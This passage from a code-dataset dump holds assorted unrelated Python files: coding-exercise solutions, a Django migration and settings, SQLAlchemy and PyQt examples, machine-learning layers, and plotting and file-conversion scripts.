0.1))\n    figure = ax.get_figure()\n    legend_loc = 'lower right' if norm == 'r' else 'upper right'\n    figure.get_axes()[0].legend(title = \"Package\", loc = legend_loc)\n    figure.savefig(\"./plots/{}_stats.png\".format(norm), dpi = 400)\n    plt.close()\n\n\nif __name__ == '__main__':\n    dataset = sys.argv[1]\n\n    assert dataset in [\"cell_lines\", \"pbmc\", \"MantonBM\", \"plot\"]\n\n    if not os.path.exists(\"./result\"):\n        if os.system(\"mkdir ./result\"):\n            sys.exit(1)\n\n    if not os.path.exists(\"./plots\"):\n        if os.system(\"mkdir ./plots\"):\n            sys.exit(1)\n\n    if dataset == 'cell_lines':\n        test_cell_lines()\n    elif dataset == 'pbmc':\n        test_pbmc()\n    elif dataset == 'MantonBM':\n        test_mantonbm()\n    else:\n        gen_plot('r')\n        gen_plot('L2')\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"352766169","text":"T = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n    # ///////////////////////////////////////////////////////////////////////////////////\n    map_list = [[0]*10 for _ in range(10)]\n    N = int(input())\n    for draw in range(N):\n        r1, c1, r2, c2, color = map(int,input().split())\n        for i in range(r1, r2+1):\n            for j in range(c1, c2+1):\n                map_list[i][j] += color\n    purple = 0\n    for row in map_list:\n        if 3 in row:\n            purple += row.count(3)\n\n    print('#{} {}'.format(test_case, purple))","sub_path":"20190808/4836.py","file_name":"4836.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"571605265","text":"arrival = [17 , 978, 409, 229, 934, 299, 982, 636, 14 , 866, 815, 64 , 537, 426, 670, 116, 95 , 630]\nduration = [17 , 502, 518, 196, 106, 405, 452, 299, 189, 124, 506, 883, 753, 567, 717, 338, 439, 145]\n\n\n# arrival = [5, 1, 1, 1, 1, 4]\n# duration = [5, 10, 3, 6, 4, 2]\ndef maxEvents(arrival, duration):\n    # Write your code here\n\n    sortedCompanies = zip(arrival, duration)\n    sortedCompanies.sort(key=lambda x: x[0])\n    print(sortedCompanies)\n    \n    eventCounter = 0\n    departure = 0\n    currentPresenterArrivalTime = 0\n    for i in range(len(arrival)):    \n        # print(sortedCompanies[i], eventCounter, departure, currentPresenterArrivalTime, sortedCompanies[i][0], sortedCompanies[i][1])\n        currDeparture = sortedCompanies[i][0] + sortedCompanies[i][1]\n        # print('before if check', sortedCompanies[i][0], currentPresenterArrivalTime, departure)\n        if sortedCompanies[i][0] >= departure:\n            currentPresenterArrivalTime = sortedCompanies[i][0]\n            departure = currDeparture\n            eventCounter += 1\n        elif currDeparture < departure:\n            print('hit here')\n            departure = min(departure, currDeparture)\n        \n    return eventCounter\n\nprint(maxEvents(arrival, duration))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"105393858","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('business_unit', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Area',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('nome', models.CharField(max_length=60, null=b'true', verbose_name=b'Nome', blank=b'true')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n            ],\n            options={\n                'verbose_name': '\\xc1rea',\n                'verbose_name_plural': '\\xc1reas',\n            },\n        ),\n        migrations.CreateModel(\n            name='Cargo',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('cargo', models.CharField(max_length=60, null=b'true', verbose_name=b'Cargo', blank=b'true')),\n            ],\n            options={\n                'ordering': ('cargo',),\n                'verbose_name': 'Cargo',\n                'verbose_name_plural': 'Cargos',\n            },\n        ),\n        migrations.CreateModel(\n            name='Funcionario',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('ativo', models.BooleanField(default=1, verbose_name=b'Ativo')),\n                ('matricula', models.IntegerField(verbose_name=b'Matricula')),\n                ('nome', models.CharField(max_length=255, verbose_name=b'Nome')),\n                ('data_contratacao', models.DateField(default=datetime.date.today, verbose_name=b'Data Contrata\\xc3\\xa7\\xc3\\xa3o')),\n                ('data_demissao', models.DateField(null=b'true', verbose_name=b'Data Demiss\\xc3\\xa3o', blank=b'true')),\n                ('data_nascimento', models.DateField(null=b'true', verbose_name=b'Data de Nascimento', blank=b'true')),\n                ('estado_civil', models.IntegerField(blank=b'true', null=b'true', verbose_name=b'Estado Civil', choices=[(1, b'Solteiro(a)'), (2, b'Casado(a)'), (3, b'Divorciado(a)'), (4, b'Vi\\xc3\\xbavo(a)')])),\n                ('sexo', models.IntegerField(blank=b'true', null=b'true', verbose_name=b'Sexo', choices=[(1, b'Masculino'), (2, b'Feminino'), (3, b'Outro')])),\n                ('endereco', models.CharField(max_length=255, null=b'true', verbose_name=b'Endere\\xc3\\xa7o', blank=b'true')),\n                ('bairro', models.CharField(max_length=255, null=b'true', verbose_name=b'Bairro', blank=b'true')),\n                ('cidade', models.CharField(max_length=255, null=b'true', verbose_name=b'Cidade', blank=b'true')),\n                ('cep', models.CharField(max_length=10, null=b'true', verbose_name=b'CEP', blank=b'true')),\n                ('telefone', models.CharField(max_length=30, null=b'true', verbose_name=b'Fone', blank=b'true')),\n                ('celular', models.CharField(max_length=30, null=b'true', verbose_name=b'Celular', blank=b'true')),\n                ('telefone2', models.CharField(max_length=30, null=b'true', verbose_name=b'Fone Recado', blank=b'true')),\n                ('email', models.EmailField(max_length=254, null=b'true', verbose_name=b'E-mail', blank=b'true')),\n      
          ('tipo_sanguineo', models.CharField(max_length=5, null=b'true', verbose_name=b'Tipo Sanguineo', blank=b'true')),\n                ('team', models.CharField(max_length=30, null=b'true', verbose_name=b'Equipe', blank=b'true')),\n                ('turno', models.CharField(max_length=30, null=b'true', verbose_name=b'Turno', blank=b'true')),\n                ('obs', models.TextField(null=b'true', verbose_name=b'Obs', blank=b'true')),\n                ('area', models.ForeignKey(blank=b'true', to='funcionario.Area', null=b'true')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n                ('cargo', models.ForeignKey(blank=b'true', to='funcionario.Cargo', null=b'true')),\n            ],\n            options={\n                'ordering': ('nome',),\n                'verbose_name': 'Funcion\\xe1rio',\n                'verbose_name_plural': 'Funcion\\xe1rios',\n            },\n        ),\n        migrations.CreateModel(\n            name='Permissao',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('definitiva', models.BooleanField(default=True, verbose_name=b'Definitiva')),\n                ('validade', models.DateField(default=datetime.date.today, verbose_name=b'Data de Validade')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n                ('funcionario', models.ForeignKey(blank=b'true', to='funcionario.Funcionario', null=b'true')),\n            ],\n            options={\n                'verbose_name': 'Permiss\\xe3o',\n                'verbose_name_plural': 'Permiss\\xf5es',\n            },\n        ),\n        migrations.CreateModel(\n            name='Permissao_Especial',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('nome', models.CharField(max_length=60, null=b'true', verbose_name=b'Nome', blank=b'true')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n            ],\n            options={\n                'verbose_name': 'Permiss\\xe3o Especial',\n                'verbose_name_plural': 'Permiss\\xf5es Especiais',\n            },\n        ),\n        migrations.AddField(\n            model_name='permissao',\n            name='permissao_especial',\n            field=models.ForeignKey(blank=b'true', to='funcionario.Permissao_Especial', null=b'true'),\n        ),\n        migrations.AlterUniqueTogether(\n            name='funcionario',\n            unique_together=set([('matricula', 'business_unit')]),\n        ),\n    ]\n","sub_path":"funcionario/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"540251075","text":"import os\r\nimport re\r\n\r\nimport xlrd\r\nfrom xlsxwriter.utility import xl_rowcol_to_cell\r\n\r\n\r\nclass ExcelFinder:\r\n    def __init__(self, dir_names):\r\n        self.excel_files = self.find_excel_files(dir_names)\r\n\r\n    def find_excel_files(self, dir_names):\r\n        excel_files = []\r\n        for dir_name in dir_names:\r\n            files = os.listdir(dir_name)\r\n            for file in files:\r\n                full_name = os.path.join(dir_name, file)\r\n                ext = os.path.splitext(full_name)[1]\r\n                if ext in ['.xls', '.xlsx', '.xlsm'] \\\r\n                        and not re.search(r\"^\\~\\$\", file):\r\n                    excel_files.append(full_name)\r\n\r\n        return excel_files\r\n\r\n    def text_search(self, search_text):\r\n        find_results = []\r\n        for excel_file in self.excel_files:\r\n            workbook = xlrd.open_workbook(excel_file)\r\n            sheets = workbook.sheets()\r\n\r\n            for sheet in sheets:\r\n                for row in range(sheet.nrows):\r\n                    for col in range(sheet.ncols):\r\n                        cell = sheet.cell(row, col)\r\n                        if search_text in cell.value:\r\n                            cell_name = xl_rowcol_to_cell(row, col)\r\n                            find_results.append((excel_file, sheet.name, cell.value, cell_name))\r\n\r\n        return find_results\r\n\r\n\r\nif __name__ == '__main__':\r\n    excel_finder = ExcelFinder([r\"D:\\excel_test\", r\"D:\\excel_test\\sub\"])\r\n    find_results = excel_finder.text_search(\"02018878-0005\")\r\n\r\n    print(find_results)","sub_path":"excel_finder/excel_finder.py","file_name":"excel_finder.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"88913755","text":"import datetime as dt\nimport devfx.databases.sqlalchemy as sadb\n\nBaseDatabaseEntity = sadb.orm.create_base_database_entity_type()\n\n\"\"\" Schema\n\"\"\"\nclass Entity1(BaseDatabaseEntity):\n    __tablename__ = \"entity1\"\n\n    id = sadb.orm.Column_as__Integer_id()\n    entity2s = sadb.orm.Relationship_one_to_many(\"Entity2\")\n\n    created_on = sadb.orm.Column_as__created_on()\n    updated_on = sadb.orm.Column_as__updated_on()\n\n    def __repr__(self):\n        return \"Entity1(id={self.id}, \"\\\n                    \"created_on={self.created_on}, \"\\\n                    \"created_on={self.updated_on})\".format(self=self)\n\n\nclass Entity2(BaseDatabaseEntity):\n    __tablename__ = \"entity2\"\n    id = sadb.orm.Column_as__Integer_id()\n    entity1_id = sadb.orm.Column_as_ForeignKey(\"entity1.id\")\n    entity1 = sadb.orm.Relationship_many_to_one(\"Entity1\")\n\n    BigInteger = sadb.orm.Column_as_BigInteger()\n    Integer = sadb.orm.Column_as_Integer()\n    SmallInteger = sadb.orm.Column_as_SmallInteger()\n    FixedPointNumber = sadb.orm.Column_as_FixedPointNumber()\n    FloatingPointNumber = sadb.orm.Column_as_FloatingPointNumber()\n\n    String = sadb.orm.Column_as_String()\n    Text = sadb.orm.Column_as_Text()\n\n    Boolean = sadb.orm.Column_as_Boolean()\n\n    DateTime = sadb.orm.Column_as_DateTime()\n    Date = sadb.orm.Column_as_Date()\n    Time = sadb.orm.Column_as_Time()\n    Timedelta = sadb.orm.Column_as_Timedelta()\n\n    created_on = sadb.orm.Column_as__created_on()\n    updated_on = sadb.orm.Column_as__updated_on()\n\n    def __repr__(self):\n        return \"Entity2(id={self.id}, \"\\\n                \"id_entity1={self.entity1_id}, \" \\\n                \"BigInteger={self.BigInteger}, \" \\\n                \"Integer={self.Integer}, \"\\\n                \"SmallInteger={self.SmallInteger}, \"\\\n                \"FixedPointNumber={self.FixedPointNumber}, \"\\\n                \"FloatingPointNumber={self.FloatingPointNumber}, \"\\\n                \"String='{self.String}', \" \\\n                \"Text='{self.Text}', \" \\\n                \"Boolean={self.Boolean}, \"\\\n                \"DateTime={self.DateTime}, \"\\\n                \"Date={self.Date}, \"\\\n                \"Time={self.Time}, \"\\\n                \"Timedelta={self.Timedelta}, \"\\\n                \"created_on={self.created_on}, \"\\\n                \"created_on={self.updated_on})\".format(self=self)\n\n\n\"\"\" Connection string\n\"\"\"\nconnection_string = 'sqlite:///devfx_samples/database/sqlalchemy/orm/didactic1.db'\n\n\"\"\" Deploy\n\"\"\"\nsadb.orm.deploy_database_metadata(BaseDatabaseEntity, connection_string)\n\n\n\"\"\" Create\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as session:\n    entity11 = Entity1()\n    session.add(entity11)\n    session.flush()\n\n    entity21 = Entity2()\n    entity21.entity1_id = entity11.id\n    entity21.BigInteger = 1\n    entity21.Integer = 1\n    entity21.SmallInteger = 1\n    entity21.FixedPointNumber = 1\n    entity21.FloatingPointNumber = 1.0\n    entity21.String = \"1\"\n    entity21.UnicodeString = \"1\"\n    entity21.Text = \"1\"\n    entity21.UnicodeText = \"1\"\n    entity21.Boolean = True\n    entity21.DateTime = dt.datetime.utcnow()\n    entity21.Date = entity21.DateTime.date()\n    entity21.Time = entity21.DateTime.time()\n    entity21.Timedelta = dt.timedelta(seconds=8)\n    session.add(entity21)\n    session.flush()\n\n    entity22 = Entity2()\n    entity22.entity1_id = entity11.id\n    
entity22.BigInteger = 2\n    entity22.Integer = 2\n    entity22.SmallInteger = 2\n    entity22.FixedPointNumber = 2\n    entity22.FloatingPointNumber = 1.0\n    entity22.String = \"2\"\n    entity22.UnicodeString = \"2\"\n    entity22.Text = \"2\"\n    entity22.UnicodeText = \"2\"\n    entity22.Boolean = True\n    entity22.DateTime = dt.datetime.utcnow()\n    entity22.Date = entity21.DateTime.date()\n    entity22.Time = entity21.DateTime.time()\n    entity22.Timedelta = dt.timedelta(seconds=8)\n    session.add(entity22)\n    session.flush()\n\n\"\"\" Query\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as dbsession:\n    entity1_list = dbsession.query(Entity1.id).all()\n    for entity1 in entity1_list:\n        print(entity1)\n\n    entity2_list = dbsession.query(Entity2).all()\n    for entity2 in entity2_list:\n        print(entity2)\n\n\"\"\" Update\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as dbsession:\n    entity2_list = dbsession.query(Entity2).all()\n    for entity2 in entity2_list:\n        entity2.Integer = entity2.Integer+1\n\n\"\"\" Delete\n\"\"\"\n# with sadb.orm.DatabaseSession(database_connection_string) as dbsession:\n#     entity1 = dbsession.query(Entity1).first()\n#     dbsession.delete(entity1)\n\n\n\"\"\" Relationship\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as dbsession:\n    entity1 = dbsession.query(Entity1).first()\n    print(entity1.entity2s)\n    entity2 = dbsession.query(Entity2).first()\n    print(entity2.entity1)","sub_path":"solution/devfx_samples/database/sqlalchemy/orm/didactic1.py","file_name":"didactic1.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"26080026","text":"import os\nimport subprocess\n\ndef svg_to_png(svg_path, dpi=300):\n    \"\"\"Convert svg file to PNG using inkscape.\n    \"\"\"\n    cmd = \"inkscape -e {} --export-area-page -d {} {}\"\n    out = svg_path.replace('.svg', '.png')\n    p = subprocess.call(cmd.format(out, dpi, svg_path), shell=True)\n    return out\n\ndef svg_to_pdf(svg_path, via_png=False):\n    \"\"\"Convert svg file to PDF using ImageMagick.\n    \"\"\"\n    if via_png:\n        in_path = svg_to_png(svg_path)\n    else:\n        in_path = svg_path\n\n    cmd = \"convert {} {}\"\n    fpdf = svg_path.replace('.svg', '.pdf')\n    p = subprocess.call(cmd.format(in_path, fpdf), shell=True)\n\n    if via_png:\n        os.remove(in_path)\n\n    return fpdf\n\ndef docx_to_pdf(docx_path):\n    \"\"\"\n    \"\"\"\n    cmd = \"unoconv {}\"\n    p = subprocess.call(cmd.format(docx_path), shell=True)\n","sub_path":"figtools/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"618487843","text":"from itertools import cycle\n\ndef solution(answers):\n    count = [0,0,0]\n    answer = []\n\n    supo1=[1,2,3,4,5]\n    supo2=[2,1,2,3,2,4,2,5]\n    supo3=[3,3,1,1,2,2,4,4,5,5]\n\n    for one,two,three,num in zip(cycle(supo1),cycle(supo2),cycle(supo3),answers):\n        if one == num:\n            count[0]+=1\n        if two == num:\n            count[1]+=1\n        if three == num:\n            count[2]+=1\n\n    for index,value in enumerate(count):\n        if value == max(count):\n            answer.append(index+1)\n\n    return answer\n\nanswers=[1,3,2,4,2]\n\nprint(solution(answers))","sub_path":"프로그래머스/모의고사 _ 완전탐색.py","file_name":"모의고사 _ 완전탐색.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"206423280","text":"class IconTrainingModel:\n\n    def create_dataset(img_folder):\n        img_data_array=[]\n        class_name=[]\n        for dir1 in os.listdir(img_folder):\n            for file in os.listdir(os.path.join(img_folder, dir1)):\n                #print(\"file\",file)\n                image_path= os.path.join(img_folder, dir1,  file)\n                #print(\"image_path\",image_path)\n                image= imread( image_path)#, cv2.COLOR_BGR2RGB)\n                #if(isempty(image))\n                image=cv2.resize(image,(img_height, img_width),interpolation = cv2.INTER_AREA)\n                image=np.array(image)\n                image = image.astype('float32')\n                image /= 255\n                img_data_array.append(image)\n                class_name.append(dir1)\n        img=np.array(img_data_array)\n        msk=np.array(class_name)\n        return img_data_array, class_name\n\n    def target_val(y_train):\n        target_dict={k: v for v, k in enumerate(np.unique(y_train))}\n        target_dict\n        target_val=  [target_dict[y_train[i]] for i in range(len(y_train))]\n        print(target_val)\n        return target_val\n    \n    def cnn_model(num_classes):\n        model = Sequential([\n        layers.Conv2D(16, 3, padding='same', activation='relu'),\n        layers.MaxPooling2D(),\n        layers.Conv2D(32, 3, padding='same', activation='relu'),\n        layers.MaxPooling2D(),\n        layers.Conv2D(64, 3, padding='same', activation='relu'),\n        layers.MaxPooling2D(),\n        layers.Flatten(),\n        layers.Dense(128, activation='relu'),\n        layers.Dense(num_classes)\n        ])\n        return model\n\n    def train_model(model, x_train, target_val):\n        model.compile(optimizer='adam',loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),metrics=['accuracy'])\n        history = model.fit(x_train,np.array(target_val), batch_size=10, epochs=5, verbose=1)\n        return history\n       \n    \n","sub_path":"IconsTrainingModel.py","file_name":"IconsTrainingModel.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"654188892","text":"import theano\nimport lasagne\nimport theano.tensor as T\nfrom ops.gumbel_softmax import gumbel_softmax\nfrom ops.gradient_switch_op import gradient_switch_op\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams\n\n\nclass GumbelSoftmaxLayer(lasagne.layers.Layer):\n    def __init__(self, incoming, temperature, K, hard=False,**kwargs):\n        super(GumbelSoftmaxLayer, self).__init__(incoming, **kwargs)\n        self.trng = RandomStreams(12345)\n        self.hard = hard\n        self.K = K\n        self.temperature = temperature\n\n    def get_output_for(self, input_, **kwargs):\n        input_reshaped = T.reshape(input_, (-1, 2))\n        log_q_y = T.nnet.logsoftmax(input_reshaped)\n        concept_disc = gumbel_softmax(log_q_y,\n                                      self.trng,\n                                      temperature=self.temperature,\n                                      hard=self.hard)\n        output = T.reshape(concept_disc, (-1, 1, self.K, self.K))\n        return output\n\n    def get_output_shape_for(self, input_shape):\n        return (input_shape[0], 1, self.K, self.K)","sub_path":"theano/gans/BGAN/old/DISC-MNIST-PFAKE/layers/gs_layer.py","file_name":"gs_layer.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"533280125","text":"__author__ = 'Corey'\n\n# s = r\"sss\\nss\"\n# print s\n\n# print 3*\"22\"\n\n# s = ('222'\n# '333')\n# print s\n\n# s='supercalifragilisticexpialidocious'\n# print len(s)\n\n# s = u\"hello\\u002055r\"\n# print s\n# a, b = 0, 1\n# while b < 10:\n#     print b\n#     a, b = b, a+b\n\n\n \n","sub_path":"PythonCode/helloworld/str.py","file_name":"str.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"434005849","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n=========================================================\nThe Iris Dataset\n=========================================================\nThis data sets consists of 3 different types of irises'\n(Setosa, Versicolour, and Virginica) petal and sepal\nlength, stored in a 150x4 numpy.ndarray\n\nThe rows being the samples and the columns being:\nSepal Length, Sepal Width, Petal Length and Petal Width.\n\nThe below plot uses the first two features.\nSee `here `_ for more\ninformation on this dataset.\n\"\"\"\nprint(__doc__)\n\n\n# Code source: Gaël Varoquaux\n# Modified for documentation by Jaques Grobler\n# License: BSD 3 clause\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import datasets\nfrom sklearn.decomposition import PCA\nimport loader\n\n\nx_labels = []\nf = open(\"t_xlabels.txt\",\"r\")\nline = f.read()\nfor label in line.split(\",\"):\n    x_labels.append(label[1:len(label)-1])\n# x_labels = {\"SepalLengthCm\",\"SepalWidthCm\",\"PetalLengthCm\",\"PetalWidthCm\"}\nX, y, type2id = loader.load_data('Iris_t.csv', y_label=\"Species\", x_labels=x_labels)\n\nsummation_X = []\nsummation_Y = []\nfor vector in X:\n    index = 1\n    result = 0\n    for v in vector:\n        if(v>0):\n            result+=(index*v)\n\n    index+=1\n    summation_X.append(result)\n\nprint(summation_X)\nprint(len(X[0]))\n\n#for i in y:\n    #for j in X[i]:\n        #print i,\" \",j\n    #print(X[:,i])\n# for x in y:\n#     print \"y: \",x\n#     print \"x: \", X[:,x]\n# import some data to play with\n# iris = datasets.load_iris()\n# X = iris.data[:, :3]  # we only take the first two features.\n# y = iris.target\n\nx_min, x_max = min(summation_X) , max(summation_X)\ny_min, y_max = y.min(), y.max()\nfor i in y:\n    summation_Y.append((y_min+y_max)/2)\nplt.figure(2, figsize=(8, 6))\nplt.clf()\nprint(len(summation_X),\" \",len(y))\n#Plot the training points\nplt.scatter(summation_X,summation_Y, c=y, cmap=plt.cm.Set1,\n            edgecolor='k')\nprint(\"max: \",x_max)\nprint(\"min: \",x_min)\n\nplt.xlabel('Uncommon Word Count')\nplt.ylabel(' ')\n\nplt.xlim(x_min, x_max)\nplt.ylim(y_min, y_max)\nplt.xticks(())\nplt.yticks(())\n\n# To getter a better understanding of interaction of the dimensions\n# plot the first three PCA dimensions\nfig = plt.figure(1, figsize=(8, 6))\nax = Axes3D(fig, elev=-150, azim=110)\ncomponents = len(X[0])\nprint(components)\nX_reduced = PCA(n_components=147).fit_transform(X)\nax.scatter(summation_X,0, c=y,\n           cmap=plt.cm.Set1, edgecolor='k',s=40)\nax.set_title(\"First three PCA directions\")\nax.set_xlabel(\"1st eigenvector\")\nax.w_xaxis.set_ticklabels([])\nax.set_ylabel(\"2nd eigenvector\")\nax.w_yaxis.set_ticklabels([])\nax.set_zlabel(\"3rd eigenvector\")\nax.w_zaxis.set_ticklabels([])\n\nplt.show()\n","sub_path":"ClusteringPT/ClusteringPT/plot_iris_dataset.py","file_name":"plot_iris_dataset.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"528121926","text":"from example.page_example import (\n    bar_datazoom_slider,\n    grid_mutil_yaxis,\n    line_markpoint,\n    pie_rosetype,\n    table_base,\n)\nfrom pyecharts.charts import Tab\n\n\ndef tab_base():\n    tab = Tab()\n    tab.add(bar_datazoom_slider(), \"bar-example\")\n    tab.add(line_markpoint(), \"line-example\")\n    tab.add(pie_rosetype(), \"pie-example\")\n    tab.add(grid_mutil_yaxis(), \"grid-example\")\n    tab.add(table_base(), \"table-example\")\n    tab.render()\n","sub_path":"example/tab_example.py","file_name":"tab_example.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"180747764","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom notes import Notebook\nfrom notes.ui.notebookpreviewtreewidget import NotebookPreviewTreeWidget\n\n\nclass NotebookFilterDialog(QDialog):\n\n    def __init__(self, parent=None, notebook: Notebook = None):\n        super(QDialog, self).__init__(parent, Qt.WindowSystemMenuHint | Qt.WindowCloseButtonHint | Qt.WindowTitleHint)\n        self.notebook: Notebook = notebook.shallow_clone()\n        self.setWindowTitle(\"Filter notes\")\n        self.filteredNoteBook: Notebook = self.notebook.shallow_clone()\n        self.setMinimumWidth(200)\n\n        pixmap = QPixmap(32, 32)\n        pixmap.fill(Qt.transparent)\n        # self.setWindowIcon(QIcon(\"icons/insert_link.png\"))\n\n        # self.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint)\n\n        self.initUI()\n\n    def initUI(self):\n\n        layout = QVBoxLayout()\n\n        self.noteFilterEdit = QLineEdit()\n        self.noteFilterEdit.setPlaceholderText(\"Enter a filtered expression\")\n\n        # self.tagsFilterEdit = QLineEdit()\n        # self.tagsFilterEdit.setPlaceholderText(\"Enter a tags separated by ','\")\n\n        self.tagsListWidget = QListWidget()\n\n        for tag in self.notebook.tag_base.tags:\n            item = QListWidgetItem()\n            item.setText(tag)\n            item.setFlags(item.flags() | Qt.ItemIsUserCheckable)\n            item.setCheckState(Qt.Unchecked)\n\n            self.tagsListWidget.addItem(item)\n\n        self.notePreviewWidget = NotebookPreviewTreeWidget()\n        self.notePreviewWidget.load_notebook(self.filteredNoteBook)\n\n        layout.addWidget(self.noteFilterEdit)\n        # layout.addWidget(self.tagsFilterEdit)\n\n        if self.tagsListWidget.count() > 0:\n            layout.addWidget(self.tagsListWidget)\n        layout.addWidget(self.notePreviewWidget)\n\n        self.filterButton = QPushButton(\"Filter\")\n        self.filterButton.clicked.connect(self.filter)\n\n        layout.addWidget(self.filterButton)\n\n        buttons = QDialogButtonBox(\n            QDialogButtonBox.Ok | QDialogButtonBox.Cancel,\n            Qt.Horizontal, self)\n\n        buttons.setCenterButtons(True)\n        buttons.accepted.connect(self.accept)\n        buttons.rejected.connect(self.reject)\n        layout.addWidget(buttons, Qt.AlignCenter)\n\n        self.setLayout(layout)\n\n    def getTags(self):\n        tags = []\n        for i in range(self.tagsListWidget.count()):\n            item = self.tagsListWidget.item(i)\n            if item.checkState() == Qt.Checked:\n                tags.append(item.text())\n        return tags\n\n    def filter(self):\n        noteFilter = self.noteFilterEdit.text()\n        tagsFilter = self.getTags()\n        self.filteredNoteBook: Notebook = self.notebook.shallow_clone()\n        self.filteredNoteBook.filter_notes(noteFilter, tagsFilter)\n        self.filteredNoteBook.remove_empty_sections()\n        self.notePreviewWidget.load_notebook(self.filteredNoteBook)\n","sub_path":"notes/ui/notebookfilterdialog.py","file_name":"notebookfilterdialog.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"551002539","text":"import os\nfrom .default import BASE_DIR, LOCAL\n\n\nSTATICFILES_FINDERS = (\n    'django.contrib.staticfiles.finders.FileSystemFinder',\n    'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\nSTATICFILES_DIRS = [\n    os.path.join(BASE_DIR, 'static'),\n]\n\nFILE_UPLOAD_PERMISSIONS = 0o644\n\nif not os.environ.get('AWS_ACCESS_KEY_ID', None):\n    # serve media/static files through local server\n    STATIC_URL = '/static/' if not LOCAL else '/local-static/'\n    STATIC_ROOT = os.path.join(\n        BASE_DIR,\n        '.static/'\n    )\n\n    MEDIA_ROOT = os.path.join(BASE_DIR, '.media/')\n    MEDIA_URL = os.environ.get('MEDIA_URL', '/media/')\n    USING_S3 = False\nelse:\n    # serve media/static files through amazon s3\n    AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\n    AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n    AWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME')\n    AWS_QUERYSTRING_AUTH = False\n\n    STATICFILES_LOCATION = 'static'\n    STATIC_URL = 'https://s3.amazonaws.com/{}/{}/'.format(\n        AWS_STORAGE_BUCKET_NAME, STATICFILES_LOCATION)\n    STATICFILES_STORAGE = 'centro59.storages.StaticStorage'\n\n    MEDIAFILES_LOCATION = 'media'\n    MEDIA_URL = 'https://s3.amazonaws.com/{}/{}/'.format(\n        AWS_STORAGE_BUCKET_NAME, MEDIAFILES_LOCATION)\n    DEFAULT_FILE_STORAGE = 'centro59.storages.MediaStorage'\n\n    AWS_S3_OBJECT_PARAMETERS = {\n        'CacheControl': 'max-age=86400',\n    }\n\n    USING_S3 = True\n\nVERSATILEIMAGEFIELD_SETTINGS = {\n    'cache_length': 2592000,\n    'cache_name': 'versatileimagefield_cache',\n    'jpeg_resize_quality': 85,\n    'sized_directory_name': '__sized__',\n    'filtered_directory_name': '__filtered__',\n    'placeholder_directory_name': '__placeholder__',\n    